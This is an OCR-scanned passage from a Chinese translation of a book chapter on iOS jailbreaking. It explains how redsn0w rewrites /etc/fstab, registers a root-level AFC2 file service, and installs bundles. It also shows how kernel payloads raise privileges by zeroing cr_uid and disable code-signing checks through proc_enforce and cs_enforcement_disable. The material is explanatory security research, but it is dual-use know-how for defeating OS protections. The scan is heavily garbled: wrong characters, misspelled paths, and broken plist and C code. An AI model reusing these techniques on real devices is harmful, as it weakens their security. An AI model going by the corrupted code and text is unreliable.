只 包含 了 一 部 分 在 完美 越狱 的 系统 中 常见 的 内 核 补 丁 。 该 ramdisk 是 每 次 执行 越狱 时 按 要 求生 成 
的 ， 因 为 根据 用 户 在 执行 越狱 时 各 项 设置 的 不 同 需要 在 ramdisk 根 目录 中 创建 不 同 的 文件 。 然 后 ， 
该 ramdisk 上 的 越狱 可 执行 文件 会 检测 出 现 了 哪些 文件 ， 从 而 决定 应 该 激活 redsn0w 的 哪些 功能 。 
例如 ， 如 果 出 现 名 为 /noUntetherHacks 的 文件 ， 它 就 会 跳 过 完美 越狱 漏洞 攻击 程序 的 安装 。 

在 引导 完 该 ramdisk 后 ， 内 核 就 会 执行 其 中 的 /sbim/launchd 二 进 制 文件 ， 而 此 文件 中 包含 了 初 
始 化 越狱 工具 的 小 存根 。 该 二 进 制 文件 首先 会 把 根 文件 系统 和 数据 部 分 挂 接 到 系统 中 。 因 为 要 作 
出 修改 ， 所 以 挂 接 的 这 两 项 内 容 都 是 可 读 写 的 。 最 后 ， 名 为 jailbreak 的 可 执行 文件 会 接管 一 切 并 
执行 接 下 来 的 步骤 。 


10.3.3 ”为 文件 系统 越狱 


默认 情况 下 ，iPhone 的 文件 系统 分 为 两 部 分 。 第 一 部 分 是 根 文件 系统 ， 其 中 包含 着 iOS 操 作 
系统 文件 以 及 MobileMail 或 MobileSafari 这 样 的 标准 应 用 程序 。 在 iOS 的 较 早 期 版 本 中 ， 根 文件 系 
统 的 大 小 约 等 于 这 部 分 所 包含 文件 的 大 小 , 基本 没有 多 少 剩余 的 空 闪 空间 。 而 现在 的 根 文件 系统 
大 小 约 为 1 GB， 并 且 有 200 MB 的 空闲 空间 ， 这 些 空闲 空间 应 该 是 不 可 修改 的 ， 因 此 默认 是 以 只 
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读 方 式 挂 接 的 。 而 设备 存储 空间 的 剩余 部 分 则 会 分 配给 第 二 部 分 一 一 数据 部 分 , 该 部 分 以 可 读 写 
方式 挂 接 到 /private/var 目 录 。 这 是 由 根 文件 系统 中 的 /etc/fstab 文 件 配置 的 。 


/dev/disk0s1 / hfs ro 0 1 
/dev/disk0s2 /private/var hfs rw,nosuid,nodev 0 2 


正如 大 家 可 以 看 到 的 , 数据 部 分 的 挂 接 配置 含有 标志 nodev 和 和 nosuid。nodev 标 志 确 保 ( 
为 文件 系统 级 的 攻击 ) 可 能 出 现在 可 写 数据 部 分 的 设备 节点 将 被 忽略 ，nosuidq 标 志 则 会 告诉 内 
核 忽略 数据 部 分 中 可 执行 文件 的 suid 位 。 而 suid 位 标记 的 可 执行 文件 需要 以 root 权 限 运 行 , 或 
一 般 情况 下 以 一 个 不 同 用 户 ( 并 非 那 个 执行 该 文件 的 用 户 ) 的 身份 运行 。 因此， 这 两 个 标志 可 以 
在 iOS 内 部 设置 一 道 防御 权限 提升 漏洞 攻击 程序 的 小 型 防线 。 

这 种 默认 配置 对 于 所 有 越狱 工具 来 说 都 是 个 问题 ， 不 管 是 bootrom 级 的 越狱 还 是 用 户 空间 级 
的 越狱 ， 因 为 这 些 越狱 都 需要 对 根 文 件 系统 进行 修改 ， 以 期 在 重启 后 继续 存活 ， 或 是 能 添加 额外 
的 守护 进程 和 服务 。 这 样 一 来 ， 每 种 越狱 在 取得 root 权 限 后 的 第 一 项 活动 都 是 以 可 读 写 方式 挂 
接 (重新 挂 接 ) 根 文件 系统 。 为 了 在 重启 后 保持 这 种 改变 ， 下 一 步 是 要 用 下 面 的 内 容 蔡 换 系 统 的 
/tec/fstab 文 件 : 


/dev/disk0s1 / hfs rw 0 1 
/dev/disk0s2 /private/var hfs rw 0 2 


新 的 文件 系统 配置 会 以 可 读 写 方式 载 入 根 文件 系统 , 并 从 第 二 部 分 的 挂 接 配置 中 移 除 hodev 


和 nosuigd 标 志 。 





























10.3.4 ”安装 完美 越狱 漏洞 攻击 程序 


每 当 新 版 iOS 问 世 时 ， 之 前 发 现 的 漏洞 就 会 被 封 堵 。 因 此 存在 这 样 一 个 时 期 ， 就 是 zedqsnow 
工具 可 以 为 旧 设 备 的 新 固件 越狱 ， 但 不 能 安装 完美 越狱 漏洞 攻击 程序 。 

一 旦 出 现 新 的 完美 越狱 漏洞 攻击 程序 ，redsn0w 的 作者 就 会 对 其 进行 修改 , 使 redsn0w 能 安 
装 该 漏洞 攻击 程序 。 因 为 每 套 这 样 的 漏洞 攻击 程序 都 不 同 ， 所 以 它们 总 需要 不 同 的 安装 步骤 。 

不 过 , 虽然 实际 的 完美 越狱 安装 过 程 不 同 , 但 是 这 通常 不 过 是 重 命名 或 移动 根 文件 系统 中 的 
某 些 文件 ， 然 后 将 一 些 额 外 的 文件 复制 到 根 文件 系统 中 。 当 大 家 反 编译 当前 版 本 的 redsn0w 时 ， 
可 以 看 到 它 能 支持 为 从 4.2.1 到 5.0.1 的 大 多 数 iOS 版 本 安装 完美 越狱 程序 ， 并 能 了 解 到 每 种 完美 越 
狱 具 体 需要 哪些 文件 。 





















































10.3.5 ”安装 AFC2 服务 


AFC (Apple File Connection， 苹 果 文 件 连接 ) 是 每 一 部 让 hone 上 都 会 运行 的 文件 传输 服务 ， 
它 让 用 户 可 以 通过 USB 连 接 访 问 iPhone 媒 体 文件 目录 /var/mobile/Media 中 的 文件 。 该 服务 是 通过 
lockdowngd 守 护 进程 提供 的 ， 而 且 名 为 com.apple.afc。 不 过 ，lockdownd 只 是 提供 对 该 服务 
的 访问 ， 它 的 实际 实现 在 afca 守 护 进程 中 。 我 们 可 以 在 Mac 机 上 通过 MobileDevice. 
framework， 或 在 Windows PC 机 上 通过 iTunesMobileDevice.d11 访 问 该 服务 。 
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第 二 项 lockdownd 服 务 注册 的 名 称 是 com.apple.crashreportcopymobile， 它 也 是 由 
afcd 实 现 的 ， 用 于 将 月 演 报告 器 的 报告 从 设备 复制 到 计算 机 ， 而 且 为 其 提供 的 读 写 访问 权限 仅 
限于 读 写 /varmobile/Library/Logs/CrashReporter 目 录 及 其 子 目 录 。 

因为 这 两 项 服务 都 只 是 以 mobile 用 户 的 权限 运行 的 ， 而 且 都 被 锁定 在 特定 的 目录 ， 所 以 它 
们 对 于 越狱 而 言 作 用 有 限 。 因此 , redsn0w 和 其 他 一 些 较 早期 的 越狱 工具 都 会 用 1ockdowng 注 册 
一 个 额外 的 服务 com.apple.afc2。 该 服务 利用 afca 守 护 进 程 提供 对 整个 文件 系统 root 权 限 的 
读 写 访问 , 这 是 越狱 工具 一 项 相当 危险 的 功能 , 而 且 很 多 用 户 不 知道 有 这 个 功能 。 这 基本 上 就 意 
味 着 在 将 一 台 没 有 密码 或 处 于 未 锁定 状态 的 已 越狱 了 Phone 连 接 到 USB 外 接 电源 或 他 人 的 计算 机 
上 时 , 在 没有 用 户 交互 的 情况 下 另 一 端 能 读 写 整个 文件 系统 。 而 这 样 另 一 端的 人 就 能 盗窃 所 连接 
iPhone 上 的 所 有 数据 或 植 人 rootkit 程 序 。 

通过 改变 /System/Library/Lockdown/Services.plist 文 件 中 的 lockdownd 配 置 ， 我 们 就 能 安装 
com.apple.afc2 服 务 了 。 这 是 个 普通 的 .plist 文 件 ， 因 此 可 以 用 针对 .plist 文 件 的 标准 工具 或 API 
进行 修改 。 在 redsn0w 工 具 中 ， 是 通过 癌 该 文件 中 添加 以 下 代码 安装 这 项 新 服务 的 : 

<key>com.apple.afc2</key> 

<diet> 

<key>AllowUnactivatedService</key> 

<true /> 

<key>Label</key> 

<string>com.apple.afc2</string> 

<key>ProgramArguments</key> 

<array> 
<string>/usr/libexec/afcd</string> 
<string>--lockdown</string> 
<string>-d</string> 
<String>/</StrEing> 


</array> 
</dict> 


因为 只 要 简单 改变 配置 就 能 提供 文件 系统 的 越狱 和 新 的 AFC2 服 务 ， 而 且 不 需要 执行 未 签名 
的 二 进 制 文件 ， 所 以 它们 在 重启 后 都 还 能 起 作用 ， 甚 至 在 设备 没有 完美 越狱 可 用 时 都 没有 问题 。 
























































10.3.6 ”安装 基本 实用 工具 


苹果 公司 并 没有 为 记 hone 提 供 UNIX shell, 所 以 无 怪 乎 根 文件 系统 的 /bin 和 /usr/bin 目 录 中 几乎 
是 空 的 ， 并 未 包含 大 家 认为 能 在 这 些 目 录 中 看 到 的 可 执行 二 进 制 文件 。 事实 上 ，5.0.1 版 的 OS 只 
在 这 些 目录 中 预 装 了 5 个 可 执行 文件 : 
DD /bin/launchctl 
口 /usr/bin/awd ice3 
口 /usr/bin/DumpBasebandCrash 
QD /usr/bin/powerlog 
































口 /usr/bin/simulatecrash 
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此 ， 像 reqsn0w 这 样 的 越狱 工具 通常 会 在 这 些 目录 中 安装 一 些 实现 基本 功能 的 实用 工具 ， 
这 些 基 本 实用 工具 能 让 越狱 文件 的 安装 变 得 更 简单 。 下 面 列 出 的 工具 是 从 redsn0w ramdisk 上 的 
越狱 二 进 制 文件 中 提取 出 来 的 , 这 些 就 是 redsn0w 要 安装 的 基本 实用 工具 。 而 越狱 二 进 制 文件 中 
也 会 用 到 这 些 工 具 ， 比 方 说 用 来 解压 tar 存 档 ， 或 是 修改 .plist 文 件 的 内 容 。 
口 /bin/mv 
口 /bin/cp 
口 /bin/tar 
口 /bin/gzip 
口 /bin/gunzip 
口 /usr/sbin/nvram 
DQ /usrbin/codesign allocate 
口 /usrbin/ldid 
口 /usrbinplutil 

除了 这 些 文件 ， 它 还 安装 了 其 他 一 些 库 和 文件 ， 而 它们 只 在 越狱 时 有 用 ， 不 是 提供 给 UNIX 
shell 使 用 者 的 。 因 此 ， 我 们 在 这 里 没有 列 出 它们 。 有 意思 的 是 ， 官 方 版 的 OS 固件 现在 也 带 有 由 
redsn0w 重 写 的 /usr/sbin/nvram 二 进 制 文件 。 


10.3.7 应 用 转 存 


当 应 用 是 从 苹果 的 App Store 安 装 时 , 它们 是 直接 安装 到 /var/mobile/Applications 目 录 中 的 , 而 
该 目录 位 于 iPhone 上 容量 较 大 的 数据 部 分 中 。 因 此 ， 可 以 在 iPhone 上 安装 多 少 应 用 取决 于 数据 部 
分 有 多 少 空闲 空间 可 用 。 这 部 分 空间 通常 是 以 GB 计算 的 ， 因 此 基本 上 不 构成 什么 限制 。 

而 对 于 那些 通过 Cydia ( 相当 于 越狱 版 的 App Store ) 安装 的 越狱 应 用 而 言 ， 情 况 是 不 一 样 的 。 
这 些 应 用 ， 比 如 Cydia 本 身 和 所 有 内 置 二 进 制 文件 ， 都 是 安装 在 根 文 件 系统 的 /Applications 目 录 中 
的 。 正 如 之 前 提 过 的 ， 根 文件 系统 的 大 小 取决 于 固件 的 版 本 和 设备 的 类 型 。 通 常情 况 下 ,， 它 的 大 
小 在 1 GB 到 1.5 GB 之 间 ， 其 中 有 200 MB 是 空闲 空间 ， 这 就 没有 为 可 安装 的 应 用 留 下 多 少 空间 。 

除 此 之 外 ， 墙 纸 和 铃声 文件 也 存储 在 根 文件 系统 中 ， 分 别 存储 在 /Library/Wallpaper 和 
/Library/Ringtones 目 录 中 。 因 此 ,所 有 通过 Cydia 安 装 的 墙纸 或 铃声 都 会 看 食 已 经 很 有 限 的 应 用 安 
装 空间 。 

为 了 解决 这 一 问题 ， 多 种 越狱 工具 实现 了 一 种 名 为 “应 用 转 存 ”的 机 制 。 这 种 机 制 的 思路 是 
在 iPhone 的 数据 部 分 创建 名 为 /var/stash 的 新 目录 ， 并 将 通常 位 于 根 文件 系统 中 的 若干 目录 放 到 该 
目录 中 。 然 后 ， 原 始 目录 就 会 被 通 向 新 位 置 的 符号 链接 替代 。 

下 面 列 出 了 当前 被 转 存 到 /var/stash 目 录 中 的 目录 : 
口 /Applications 



































































































































口 /Library/Ringtones 
口 /Library/Wallpaper 
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口 /usrinclude 
DO /usr/lib/pam 


口 /usr/libexec 





DD /usr/share 

不 过 , 并 非 所 有 的 越狱 工具 或 这 些 工具 的 所 有 版 本 都 能 执行 应 用 转 存 。 如 果 越 狱 工具 不 能 完 
成 这 一 工作 , 那么 在 第 一 次 调用 Cydia 时 ，Cydia 会 检测 并 完成 这 一 工作 。 这 就 是 Cydia 中 耗 时 很 长 
的 “Reorganizing Filesystem”( 重新 组 织 文件 系统 ) 步骤 。 





10.3.8 应 用 包 安 装 


越狱 安装 过 程 的 下 一 步 是 应 用 包 的 安装 。 根据 所 使 用 越狱 工具 的 不 同 , 这 一 步 既 可 以 是 安装 
由 高 端 用 户 自己 创建 的 定制 应 用 包 ， 也 可 以 是 安装 越狱 工具 通常 会 默认 包含 的 Cydia 应 用 包 。 例 
如 redsn0w 接 受 的 应 用 包 是 可 以 用 gzip 打 包 的 tar 归 档 文件 。 它 们 可 以 由 之 前 安装 的 基本 实用 工具 
解压 缩 ， 因 此 越狱 程序 不 需要 用 于 归档 文件 解压 缩 的 代码 。 

应 用 包 安 装 过 程 会 遍历 ramdisk 上 的 每 个 应 用 包 ， 一 个 接 一 个 地 将 它们 解压 缩 。 在 解压 缩 期 
间 ，tar 被 告知 要 保持 UNIX 的 权限 ， 这 让 应 用 包 都 设置 了 值 为 root 的 suid 位 。Cydia 需 要 这 一 设 
置 ， 因 为 如 果 没 有 root 权 限 ，Cydia 是 没 法 安装 新 应 用 的 。 很 有 意思 的 是 ， 由 于 苹果 公司 机 了 些 
花招 ，GUI 应 用 可 能 不 在 它们 的 主 二 进 制 文件 中 设置 suig 位 。Cydia 的 正常 工作 要 利用 名 为 Cydia 
的 shell 脚 本 ， 该 脚本 接着 会 调用 名 为 MobileCydia 、suid 为 root 的 主 二 进 制 文件 。 

不 过 ， 在 将 应 用 包 解 压缩 到 /Applications 目 录 后 ， 应 用 包 的 安装 工作 还 没有 完成 。 安 装 的 应 
用 全 都 必须 注册 到 特殊 的 全 系统 安装 缓存 中 ， 该 缓存 是 存储 在 /var/mobile/Library/Caches/com. 
apple.mobile.installation.plist 文 件 中 的 。 这 是 个 普通 的 .plist 文 件 ， 格 式 如 下 所 示 : 
















































































<plist version="1.0"> 
<dict> 
<key>LastDevDirStat</key> 
<integer>..</integer> 
<key>Metadata</key> 
Xdiet>s /ict 
<key>System</key> 
<dict> 
<key>com.apple.xxx</key> 
<iet></diet> 
</dicts 
<key>User</key> 
<dict> 
<key>someuserapp</key> 
QiSE2eR/aEGEF 
</dicts 
/diet> 
</plist> 


该 缓存 包含 一 个 时 间 戳 、 一 些 元 数据 ,以 及 与 所 有 系统 应 用 和 用 户 应 用 有 关 的 信息 。 系 统 应 
用 是 那些 在 /Applications 目录 中 的 应 用 ， 而 用 户 应 用 则 是 从 苹果 App Store 下 载 到 
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/varmobile/Applications 目 录 中 的 。 因 此 , 所 有 的 应 用 包 都 要 在 System 缓存 项 中 注册 。 在 redsnovw 
中 , 这 一 工作 是 通过 读 取 应 用 的 Info.plist 文 件 并 利用 其 中 包含 的 信息 创建 新 缓存 项 完成 的 。 首先 ， 
我 们 要 读 取 cFBundleIdentifier 密 钥 ， 并 将 其 用 作 缓 存 的 新 密 钥 ， 然 后 把 值 为 System 的 新 密 
钥 ApplicationType 添 加 到 Info.plist 文 件 的 字典 中 ， 最 后 再 把 整个 字典 的 新 内 容 复制 到 缓存 中 。 























10.3.9 ”安装 后 的 过 程 


在 安装 好 所 有 的 文件 后 ，redsn0w 就 会 发 起 sync () 系统 调用 , 确保 所 有 文件 都 已 写 入 磁盘 。 
然后 ， 根 文件 系统 会 被 以 只 读 方 式 重 新 挂 接 ， 以 确保 所 有 的 写 缓冲 区 都 被 同步 到 磁盘 上 。 然 后 ， 
挂 接 到 /var 目 录 的 数据 部 分 就 会 被 取消 挂 接 。 为 防 挂 接 操作 失败 ， 这 一 过 程 会 一 直 重 复 ， 直 到 操 
作成 功 或 是 达到 一 定 的 重 试 次 数 。 

然后 ， 它 就 会 利用 reboot () 系统 调用 重启 系统 ， 完 成 越狱 。 对 于 不 完美 越狱 来 说 ， 设 备 会 
重启 到 非 越狱 状态 ， 除 非 已 安装 的 茶 个 应 用 包 被 引导 所 需 的 某 个 文件 自 改 过 。 然 后 ,我 们 需要 利 
用 redsn0w 将 连接 在 计算 机 上 处 于 越狱 状态 的 设备 重启 。 

而 对 于 完美 越狱 而 言 , 设备 重启 后 就 会 进入 越狱 状态 , 因为 安装 的 某 个 完美 越狱 漏洞 攻击 程 
序 会 在 引导 过 程 中 对 某 个 应 用 进行 攻击 ， 然 后 利用 另 一 个 内 核 漏洞 攻击 程序 在 内 核 中 执行 代码 。 
大 家 在 10.4 广 还 将 了 解 更 多 与 该 内 核 有 效 开 荷 相关 的 内 容 。 


10.4 ”执行 内 核 有 效 载 答 和 补丁 


在 第 9 前 介 绍 内 核 源 洞 攻 击 时 ,我 们 并 没有 讨论 内 核 级 的 有 效 载 集 ， 而 是 将 这 个 主题 留 到 本 
章 来 讲 。 这 样 做 的 原因 在 于 执行 内 核 有 效 载荷 是 越狱 过 程 中 真正 执行 越狱 工作 的 部 分 , 因而 也 是 
最 重要 的 部 分 。 正 因为 这 样 ， 我 们 认为 在 本 章 中 介绍 这 一 主题 更 为 合适 。 

虽然 每 种 内 核 漏洞 攻击 程序 和 每 种 有 效 载荷 都 不 同 , 但 大 家 可 以 看 到 越狱 工具 使 用 的 内 核 级 
有 效 载 荷 基本 上 都 会 进行 以 下 4 项 工作 : 
口 修复 内 核 状 态 ; 
口 提升 权限 ; 
口 为 内 核 打 补丁 ; 
口 干净 利落 地 返回 。 
接 下 来 ,我 们 详细 介绍 这 4 项 工作 。 


10.4.1 ”内核 状态 修复 


虽然 存在 不 同类 型 的 内 核 漏洞 , 但 在 内 核 内 部 执行 任意 代码 通常 是 因为 重 写 了 某 个 内 核 级 函 
数 指针 而 造成 的 。 根 据 漏 洞 类 型 的 不 同 , 被 重 写 的 函数 指针 可 能 只 是 内 核 内 存 的 损坏 。 不过, 很 
多 时 候 事实 并 非 如 此 。 像 栈 缓冲 区 溢出 或 堆 缓 冲 区 溢出 这 类 漏洞 往往 会 导致 更 大 区 域 受 损 。 特别 
是 在 攻击 堆 元 数据 结构 的 堆 缓 冲 区 溢出 中 , 内 核 堆 在 漏洞 攻击 完成 后 可 能 处 于 不 稳定 状态 , 这 早 
晚会 导致 内 核 严重 错误 的 出 现 。 
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因此 , 每 个 内 核 漏洞 攻击 程序 最 好 都 能 修复 它 所 引起 的 内 存 或 状态 损坏 。 第 一 步 应 该 是 把 被 
重 写 的 函数 指针 恢复 成 它 被 损坏 之 前 的 值 。 不 过 , 一 般 来 说 这 是 不 够 的 。 对 于 堆 漏洞 攻击 程序 而 
言 , 修复 内 核 可 能 是 项 非常 复杂 的 任务 ,因为 这 意味 着 需要 修复 受 攻击 的 堆 元 数据 。 根 据 处 理 内 
核 堆 所 使 用 方法 的 不 同 , 这 可 能 还 需要 扫描 内 核 内 存 , 看 看 有 没有 需要 再 次 释放 的 已 泄露 堆 内 存 
块 ， 从 而 确保 内 核 不 会 耗 尽 内 存 。 

在 堆 数据 受到 损坏 的 情况 下 , 是 否 需要 修复 内 核 栈 取决 于 具体 的 漏洞 。 系统 调用 中 存在 的 栈 绥 
冲 区 浇 出 是 不 需要 修复 的 ， 因 为 它 有 可 能 通过 抛 出 异常 离开 内 核 线程 ， 而 不 会 导致 内 核 严 重 错误 。 





















































10.4.2 ”权限 提升 


因为 Phone 上 的 所 有 应 用 都 是 以 mobile、_wireless、_mdsnresponder 或 _securityd 
这 类 权限 较 低 的 用 户 身份 运行 的 , 所 以 在 对 应 用 进行 漏洞 攻击 后 执行 的 内 核 漏 洞 攻击 程序 有 效 载 
荷 通 常会 把 运行 中 的 进程 的 权限 提升 为 root 用 户 权 限 。 如 果 没 有 这 一 步 的 话 ， 重 新 挂 接 根 文件 
系统 用 于 写 访问 或 修改 root 用 户 拥有 的 文件 等 操作 都 不 可 能 实现 。 而 这 两 项 都 是 初次 安装 越狱 
时 的 必要 操作 。 用 来 在 重启 后 保持 越狱 状态 的 完美 越狱 内 核 漏 洞 攻 击 程序 通常 已 经 是 以 root 用 
户 身 份 执行 的 ， 因 此 不 需要 这 一 步 。 

从 内 核 内 部 很 容易 提升 当前 正在 运行 的 进程 的 权限 。 我 们 需要 做 的 就 是 修改 附加 到 进程 
proc_t 结 构 体 上 的 和 凭证， 该 结构 体 在 XNU 源 代码 的 /bsd/sys/proc internalh 文 件 中 被 定义 为 
struct proc。 根 据 内 核 漏洞 攻击 程序 有 效 载 荷 开 始 方式 的 不 同 ， 有 不 同 的 方式 得 到 指向 当前 
进程 proc_t 结 构 体 的 指针 。 以 前 公开 的 很 多 iOS 内 核 漏 洞 攻击 程序 都 利用 了 不 同 内 核 漏洞 重 写 系 
统 调用 表 中 系统 调用 处 理 程序 的 地 址 , 然后 通过 调用 被 重 写 的 系统 调用 触发 内 核 漏 洞 攻击 程序 有 
效 载荷 。 在 这 种 情况 下 ， 取 得 对 broc_t 结 构 体 的 访问 权 就 不 是 难事 了 ， 因 为 提供 给 系统 调用 处 
理 程序 的 第 一 个 参数 就 是 它 ! 

要 得 到 proc_t 结 构 体 的 地 址 ， 更 一 般 的 方法 就 是 调用 会 取 回 该 结构 体 地 址 的 内 核 函 数 
current_proc() 。 该 函数 是 内 核 的 导出 符号 ,所 以 很 容易 找到 。 由 于 原始 的 内 核 漏 洞 攻 击 程序 
可 以 确定 具体 使 用 了 哪个 版 本 的 内 核 ， 因 此 可 以 把 该 函数 的 地 址 硬 编 码 到 内 核 漏洞 攻击 程序 中 ， 
因为 内 核 里 是 没有 地 址 随机 化 的 。 

第 三 种 获得 proc_t 结 构 体 地 址 的 方式 需要 利用 通过 sysct1 接 口 泄露 的 内 核 地 址 信息 。 这 一 
技巧 首先 是 由 noir (www.phrack.org/issues.html?issue=60&id=06 ) 针对 OpenBSD 内 核 提 出 的 ， 而 
后 nemo (www.phrack.org/issues.html?issue=64&id=11 ) 针对 XNU 内 核 使 用 了 它 。 这 种 信息 泄露 让 
用 户 空间 的 进程 可 以 通过 简单 的 sysct1 () 系 统 调用 ， 取 回 进程 proc_t 结 构 体 的 内 核 地 址 。 

在 取得 进程 的 proc_t 结 构 体 地 址 后 ， 我 们 就 要 使 用 该 结构 体 的 p_ucreqd 成 员 修改 附加 的 
ucred 结 构 体 。 我们 可 以 通过 proc_ucred() 函数 访问 ucred 结 构 体 , 也 可 以 直接 访问 该 结构 体 。 
下 面 的 反 汇 编 内 容 表 明 ， 在 当前 的 OS 版 本 中 ，p_ucred 字 自在 该 结构 体 中 的 偏 移 量 是 0x84: 

_proc_ucred: 


LDR.W RO, [RO,#0x84] 
BX LR 
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struct ucred 的 定义 可 以 在 /bsd/sys/ucred.h 文 件 中 找到 。 这 个 定义 中 还 包含 了 拥有 该 进程 
的 身份 的 各 种 用 户 ID 和 组 ID : 
struct ucred { 
TAILQO_ENTRY (ucred) cr_link; /* 在 没有 KAUTH_CRED_HASH_LOCK 的 情况 下 绝对 不 要 修改 它 */ 
u_long cr_ref; /* 引用 计数 */ 








struct posix cred { 
/* 
* 凭证 散 列 取决 于 从 这 里 开始 的 所 有 内 容 




















* 见 kauth_cred_get_hashkey) 
*/ 
证 宇 可 十 cr_uid; /* 有 效用 户 iqd */ 
uid 七 cr_ruid; /* 真实 用 户 iqd */ 
uidt cr_svuid; /* 已 保存 的 用 户 id */ 
short cr_ngroups; /* 咨询 列表 中 的 组 成 员 */ 
gid tt cr_groups [NGROUPS]; /* 咨询 组 列表 */ 
gid 七 cr_rgid; /* 真实 组 id */ 
gid t cr_svgid; /* 已 保存 的 组 id */ 
uid t cr_gmuid; /* 表示 组 成 员 身 份 的 UID */ 
int cr_flags; /* 凭证 上 的 标志 */ 

} cr_ posix; 
struct label *cr_label; /* MAC 标 签 */ 
/* 


* 注意 ;如 果 在 标签 之 后 添加 了 任何 (除了 标志 ) 内 容 ， 

* 就 必须 修改 kauth_cred_find() 

*/ 

struct au_session cr_audit; /* 用 户 审查 数据 */ 
}; 
要 为 拥有 该 进程 的 身份 提升 权限 ， 我 们 可 以 把 偏 移 量 0x0c 处 的 cr_uid 字 段 设 置 为 0。 这 里 
的 偏 移 量 是 0x0c 而 非 大 家 认为 的 0x08， 因 为 TAILO_ENTRY 的 宽度 是 8 字 节 。 当 然 ， 其 他 元 素 也 
是 可 以 打 补 丁 的 。 不 过 , 一 旦 uid 被 置 为 0， 用 户 空间 的 进程 就 能 利用 系统 调用 改变 它 的 权限 了 。 








10.4.3 ”为 内 核 打 补丁 


内 核 级 有 效 载荷 中 最 重要 的 部 分 就 是 为 内 核 代码 和 数据 应 用 内 核 级 补丁 , 实际 地 禁用 安全 机 
制 ， 从 而 执行 未 签名 的 代码 并 让 设备 越狱 。 这 些 年 来 , 不 同 的 越狱 开发 团队 都 开发 了 自己 专 有 的 
补丁 集 , 因此 大 多 数 越狱 工具 都 自 带 了 不 同 的 内 核 补丁 ,这 有 时 会 带 来 不 同 的 功能 。 最 常用 的 内 
核 补丁 集 是 由 comex 开 发 的 ， 参见 Github 上 的 datautils0 资 料 库 ( https://github.com/comex/ 
datautils0 )。 该 补丁 集 得 到 了 广泛 应 用 , 不 仅 comex 自 己 的 http://jailbreakme.com 用 到 了 它 , 而 且 很 
多 研究 :OS 内核 的 人 都 拿 它 作 参 考 。 不 过 ， 这 个 特殊 的 Github 资 料 库 中 的 这 些 补丁 可 能 不 会 移植 
到 未 来 版 本 的 内 核 ， 因 为 comex 在 苹果 公司 实习 了 ， 而 且 十 之 八 九 与 苹果 签订 了 合约 ， 让 他 没 法 
继续 为 iPhone 开发 越狱 工具 了 。 

不 管 怎样 ， 接 下 来 我 们 会 为 大 家 介绍 这 些 补丁 ,并 解释 它们 背后 的 思路 ， 以 让 大 家 有 能 力 为 
以 后 的 OS 版 本 自制 补丁 集 。 
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1. security.mac.proc_ enforce 

sysct1 变 量 security.mac.proc_enforce 控 制 着 是 否 对 进程 操作 实施 MAC 策 略 。 在 禁用 
之 后 ， 各 种 进程 策略 检查 和 限制 都 不 复 存 在 了 。 例 如 在 fork() 、setpriority() 、kil1() 和 
wait () 系 统 调 用 上 存在 的 限制 。 另 外 ,该 变量 还 控制 着 代码 签名 BLOB 的 数字 签名 是 否 被 验证 过 。 
在 禁用 后 ， 我 们 就 有 可 能 执行 那些 代码 签名 BLOB 是 以 错误 密 钥 签 名 过 的 二 进 制 文件 。 

在 4.3 版 之 前 的 OS 中 ， 这 在 以 root 用 户 身份 运行 的 完美 越狱 漏洞 攻击 程序 中 被 看 做 一 条 损 
径 。 这 些 程序 可 以 通过 sysct1 () 系统 调用 禁用 该 变量 ， 这 样 就 可 以 执行 包含 内 核 漏洞 攻击 程序 
的 二 进 制 文件 了 。 这 样 一 来 就 不 需要 像 现在 这 样 用 面向 返回 的 方式 编写 整个 内 核 漏 洞 攻击 程序 。 
为 了 阻止 这 种 攻击 ， 苹 果 公 司 从 iOS 4.3 起 把 sysct1 变 量变 成 只 读 的 了 。 

从 内 核 有 效 载 答 中 禁用 该 变量 也 问题 不 大 ， 因 为 大 家 可 以 直接 为 该 变量 赋值 0。 唯 一 要 完 
成 的 工作 就 是 确定 该 变量 的 内 存 地 址 。 一 种 可 能 的 解决 方案 是 对 内 核 的 __ sysct1l_set 段 进行 
扫描 ， 查 找 sysct1 变 量 的 定义 及 其 地 址 。 因 为 该 变量 在 内 核 的 data 段 中 ， 它 总 是 位 于 一 个 静 
态 地 址 。 

2. cs_enforcement_disable (内 核 ) 

页 面 错误 人 处理 程序 的 源 代 码 在 /osfmk/vm/vm faultc 文 件 中 ， 其 中 包含 了 一 个 名 为 
cs_enforcement_disable 的 变量 一 一 控制 页 面 错误 处 理 程序 是 否 实施 代码 签名 。 在 iOS 内 核 
中 ， 该 变量 默认 初始 化 为 0， 以 启用 代码 签名 的 实施 。 反 过 来 ， 如 果 将 其 设置 为 非 零 值 ， 这 就 会 
禁用 代码 签名 的 实施 。 

在 查看 这 部 分 代码 时 大 家 会 看 到 该 变量 只 用 到 了 两 次 ,而 且 都 是 用 在 vm_fault_enter () 
函数 中 。 下 面 的 代码 是 第 一 次 使 用 该 变量 的 位 置 ， 而 代码 的 注释 详细 解释 了 代码 中 正在 发 生 的 
事 


情 : 











人 




































































/* 如果 映 射 被 切换 ， 而 且 是 受到 切换 保护 的 ， 

就 必须 保护 一 些 内 存 页 免 受 误 写 ， 这 些 页 是 不 可 改变 的 ， 
因为 根据 定义 ， 为 了 防止 未 签名 代码 被 注入 ， 

它们 是 不 可 写 入 且 不 可 执行 的 页 。 

如 果 该 页 是 不 可 改变 的 ， 直 接 返 回 即 可 。 

不 过 ， 我 们 没 法 立即 确定 某 内 存 页 是 否 可 执行 ， 

但 可 以 在 每 一 处 都 解除 其 连接 ， 

并 从 当前 映射 中 移 除 可 执行 保护 。 

我 们 会 在 进行 PMAP_ENTER 之 前 完成 下 面 的 工作 











If(!cs_enforcement_ disable && map_is_ switched && map_is_ switch protected 
&& page_ immutable(m, prot) && (prot & VM PROT WRITE)) 
{ 
return KERN_CODESIGN_ERROR; 














j 
正如 大 家 在 代码 中 看 到 的 ， 如 果 设 置 了 cs_enforcement_disable 标 志 ， 代 人 码 就 会 跳 过 其 
他 的 条 件 检查 。 对 于 下 面 这 段 检查 想 要 执行 的 页 面 是 否 未 签名 的 代码 来 说 ， 情 况 也 是 这 样 : 


if (m->cs_tainted | | 
(( !cs_enforcement_ disable && !cs_bypass ) && 
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(/* 该 内 存 页 是 未 签名 的 ， 而 且 我 们 希望 它 是 可 执行 的 */ 
(!m->cs_validated && (prot & VM PROT EXECUTE)) || 
A a 4 
(page_immutable(m, prot) && ((prot & VM_ PROT_ WRITE) || m->wpmapped)) 
) ) 
) 

















{ 

在 这 两 种 情况 下 ， 当 我 们 设置 了 cs_enforcement_disable 变 量 时 ， 所 有 的 保护 都 会 被 禁 
